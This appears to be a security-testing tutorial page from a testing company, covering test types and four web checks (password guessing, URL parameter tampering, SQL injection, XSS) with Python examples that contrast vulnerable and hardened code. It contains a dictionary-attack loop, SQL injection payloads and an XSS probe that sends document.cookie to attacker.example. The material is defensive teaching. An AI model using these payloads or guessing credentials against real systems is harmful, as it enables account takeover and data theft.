security testing in software testing

According to the Open Source Security Testing Methodology Manual (OSSTMM), there are seven main types of security testing in software testing:

Vulnerability Scanning: This is done with automated software that examines a system against signatures of known vulnerabilities.

Security Scanning: This involves identifying network and system weaknesses and then providing solutions to reduce those risks. The scanning can be performed manually or with automated tools.

Penetration testing: This type of testing simulates an attack by a malicious hacker. It involves analysing a particular system to check for vulnerabilities that an external attacker could exploit.

Risk Assessment: This involves analysing the security risks observed in the organization. Risks are classified as Low, Medium or High, and the assessment recommends controls and measures to reduce them.

Security Auditing: This is an internal inspection of applications and operating systems for security flaws. An audit can also be carried out by line-by-line review of the source code.

Ethical hacking: This is hacking the organization's own software systems. Unlike malicious hackers, who hack for their own gain, the ethical hacker's goal is to expose security flaws in the system so they can be fixed.

Posture Assessment: This combines security scanning, ethical hacking and risk assessment to show the overall security posture of an organization.

How to perform security testing in software testing?

To perform useful security testing of a web application, the tester should have a good knowledge of the HTTP protocol. It is important to understand how the client and the server communicate over HTTP. The tester should also know at least the basics of XSS and SQL injection.

  1. Password cracking:

Web application penetration testing can begin with password cracking. To log in to the private areas of the application, the tester can either guess a username/password pair or use a password-cracking tool. Lists of common usernames and passwords are freely available, as are open source security testing tools for web applications that automate trying them against a login form.
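The following is an added example (not code from this page or from TestOrigen) showing what a password-cracking tool does against a login form: it tries every pair from constructed username and password lists against a constructed user store, and then shows the countermeasure a tester should look for, an account lockout after a few failed guesses. The user names, passwords and the lockout limit are assumptions for illustration.

```python
import hashlib
import hmac
import os
from typing import Dict, Tuple

# Constructed user store for the example: the application keeps a salted
# PBKDF2 hash per user, never the password itself.
def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_user_store(users: Dict[str, str]) -> Dict[str, Tuple[bytes, bytes]]:
    store = {}
    for name, pw in users.items():
        salt = os.urandom(16)
        store[name] = (salt, _hash(pw, salt))
    return store

# Constructed sample accounts (assumption): "admin" uses a password that
# appears on every common-password list, "carol" uses a strong one.
USER_STORE = make_user_store({"admin": "admin123", "carol": "Xq7!v3pLm#z9"})

# Constructed fragments of the kind of common username/password lists the
# text refers to (assumption, not a real wordlist).
COMMON_USERNAMES = ["admin", "root", "test", "user"]
COMMON_PASSWORDS = ["password", "123456", "admin", "admin123", "letmein"]

def login(username: str, password: str) -> bool:
    """Plain credential check with no limit on guesses (the weak setting)."""
    rec = USER_STORE.get(username)
    if rec is None:
        return False
    salt, digest = rec
    return hmac.compare_digest(_hash(password, salt), digest)

def dictionary_attack(login_fn, usernames, passwords):
    """Try every username/password pair against the login function.
    Returns (working_pair_or_None, attempts_used). This is what a
    password-cracker tool automates against a login form."""
    attempts = 0
    for u in usernames:
        for p in passwords:
            attempts += 1
            if login_fn(u, p):
                return (u, p), attempts
    return None, attempts

class LockoutLogin:
    """Hardened variant: after `limit` consecutive failed guesses for a
    username the account is locked and every further attempt fails, which
    caps the number of guesses an online attacker gets per account."""

    def __init__(self, limit: int = 5):
        self.limit = limit
        self.failures: Dict[str, int] = {}
        self.locked = set()

    def __call__(self, username: str, password: str) -> bool:
        if username in self.locked:
            return False
        if login(username, password):
            self.failures[username] = 0
            return True
        self.failures[username] = self.failures.get(username, 0) + 1
        if self.failures[username] >= self.limit:
            self.locked.add(username)
        return False
```

Against the unprotected `login`, the attack finds `admin`/`admin123` on its fourth attempt; against `LockoutLogin(limit=3)` the admin account is locked before the correct guess is reached and the whole run finds nothing. Note that lockout by itself lets an attacker lock other users out deliberately, so real applications usually pair it with rate limiting, CAPTCHAs or temporary rather than permanent locks.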

  2. URL manipulation through HTTP GET:

The tester should check whether the application passes sensitive data in the query string. This happens when the application uses HTTP GET to pass data between the client and the server: the data travels as parameters in the query string of the URL. The tester can modify a parameter value in the query string (for example an identifier or a price) and check whether the server accepts the modified value without verifying it.
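As an added example (not code from this page or from TestOrigen), the request handlers below show the check described above on a constructed order-lookup URL. The vulnerable handler trusts the `order_id` parameter in the query string; the hardened one reads the same parameter but authorises it against the server-side session. `tamper_check` is the tester's procedure: request your own record, change only the parameter value, and see whether the server still serves it. The URL, order data and user names are assumptions for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed data for the example: orders belonging to two different customers.
ORDERS = {
    "1001": {"owner": "alice", "total": "49.00"},
    "1002": {"owner": "bob", "total": "2300.00"},
}

def _order_id_from_url(url: str):
    """Extract the order_id parameter from the query string, or None."""
    qs = parse_qs(urlsplit(url).query)
    ids = qs.get("order_id", [])
    return ids[0] if ids else None

def view_order_vulnerable(url: str, session_user: str):
    """Trusts the order_id in the query string: any logged-in user can read any
    order just by changing the number (an insecure direct object reference).
    Returns (status_code, body)."""
    order = ORDERS.get(_order_id_from_url(url))
    if order is None:
        return 404, None
    return 200, order

def view_order_hardened(url: str, session_user: str):
    """Still reads order_id from the query string, but checks ownership
    against the server-side session before returning anything."""
    order = ORDERS.get(_order_id_from_url(url))
    if order is None:
        return 404, None
    if order["owner"] != session_user:
        return 403, None  # returning 404 here instead is also acceptable
    return 200, order

def tamper_check(handler, base_url: str, session_user: str,
                 own_id: str, other_id: str) -> bool:
    """The tester's check: fetch own record, then change only the parameter
    value to someone else's identifier. Returns True if the application
    accepted the tampered value, i.e. the handler is vulnerable."""
    status_own, _ = handler(f"{base_url}?order_id={own_id}", session_user)
    status_other, body = handler(f"{base_url}?order_id={other_id}", session_user)
    return status_own == 200 and status_other == 200 and body is not None
```

With a real target the same check is done in a browser or an intercepting proxy; the point is that the parameter value is attacker-controlled, so the server must decide what the user is allowed to see from its own session state, not from the URL.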

  3. SQL Injection:

The next thing to check is SQL injection. Entering a single quote (') into any text field should not break the application. If instead the tester gets a database error, the user input is being inserted into a query that the application then executes, and the application is vulnerable to SQL injection. The absence of an error does not prove the input is safe, since the application may simply hide database errors; the tester should also try a payload whose effect shows in the results rather than in an error, such as the tautology ' OR '1'='1.
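As an added example (not code from this page or from TestOrigen), the following uses an in-memory SQLite database to show both checks from the text against a query built by string concatenation and against the same query written with a bound parameter. The table contents and the lookup function are constructed for illustration.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "user"), ("bob", "user"), ("admin", "admin")],
    )
    return conn

def find_user_vulnerable(conn, username: str):
    """Builds the query by concatenation: the user's text becomes SQL."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def find_user_safe(conn, username: str):
    """Parameterised query: the value is bound separately from the SQL text,
    so a quote or an OR clause is just characters inside a string literal."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()

def probe(conn, lookup) -> dict:
    """The tester's two checks from the text: a lone single quote (does a
    database error surface?) and a tautology payload (do extra rows come
    back?). Returns what was observed for the given lookup function."""
    result = {}
    try:
        lookup(conn, "'")
        result["quote_error"] = False
    except sqlite3.Error:
        result["quote_error"] = True
    try:
        rows = lookup(conn, "x' OR '1'='1")
        result["tautology_rows"] = len(rows)
    except sqlite3.Error:
        result["tautology_rows"] = -1
    return result
```

For the concatenated query the lone quote produces an unterminated string literal and SQLite raises an error, and the tautology returns every row in the table; for the parameterised query neither input has any effect beyond looking up a user whose name literally contains those characters, which is also why a legitimate name such as O'Brien works there.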

  4. Cross Site Scripting (XSS):

The tester should also check the web application for XSS. HTML such as <HTML> or script such as <SCRIPT> submitted as input should not be accepted and reflected back into the page unencoded. If it is, the application is vulnerable to cross-site scripting.

Attackers use this technique to execute malicious script, or load a malicious URL, in the victim's browser. Using cross-site scripting, an attacker can run a script such as JavaScript that steals information stored in cookies, including the user's session cookie.
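As an added example (not code from this page or from TestOrigen), the following shows a constructed search page that reflects a query parameter, first verbatim and then HTML-encoded, and a check that reports which test payloads survive as real markup. The template, the probe strings (including a cookie-stealing script of the kind described above) and the attacker URL are assumptions for illustration.

```python
import html
import re

# Constructed page template (assumption); the search term is reflected
# into the response body as element text.
TEMPLATE = "<html><body><p>Results for: {term}</p></body></html>"

def render_vulnerable(term: str) -> str:
    """Reflects the parameter verbatim, so markup in it becomes part of the page."""
    return TEMPLATE.format(term=term)

def render_safe(term: str) -> str:
    """HTML-encodes the value for an element-text context: html.escape turns
    < > & " ' into entities, so the browser displays the text instead of
    parsing it as a tag."""
    return TEMPLATE.format(term=html.escape(term, quote=True))

# Constructed probes of the kind the text suggests: a plain tag, a script
# that sends document.cookie to an attacker-controlled host (assumed URL),
# and an image tag with an event handler.
PROBES = [
    "<b>bold</b>",
    "<script>document.location='https://attacker.example/?c='+document.cookie</script>",
    "\"><img src=x onerror=alert(1)>",
]

# Tags whose appearance in the response would mean the probe was parsed as markup.
_TAG = re.compile(r"<\s*/?\s*(script|img|b|svg|iframe)\b", re.IGNORECASE)

def reflected_unescaped(render, probe: str) -> bool:
    """True if the probe's markup survives into the response as a real tag,
    i.e. the tester sees <tag> in the page source rather than &lt;tag&gt;."""
    body = render(probe)
    return _TAG.search(body) is not None and probe in body

def xss_findings(render):
    """Run every probe through a renderer and return the ones that were reflected as markup."""
    return [p for p in PROBES if reflected_unescaped(render, p)]
```

Every probe is reported for `render_vulnerable` and none for `render_safe`. Note that `html.escape` is the right encoding only for element text and quoted attribute values; a value placed inside a script block, a URL or an unquoted attribute needs the encoding appropriate to that context, so the tester should try each place where input is reflected.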


TestOrigen provides web security testing and information security testing using a range of website security testing tools, and has become a boon to many domains in terms of protection against data breaches. Our security testing techniques are up to date and refreshed regularly to deliver high-quality security testing in the software testing world.

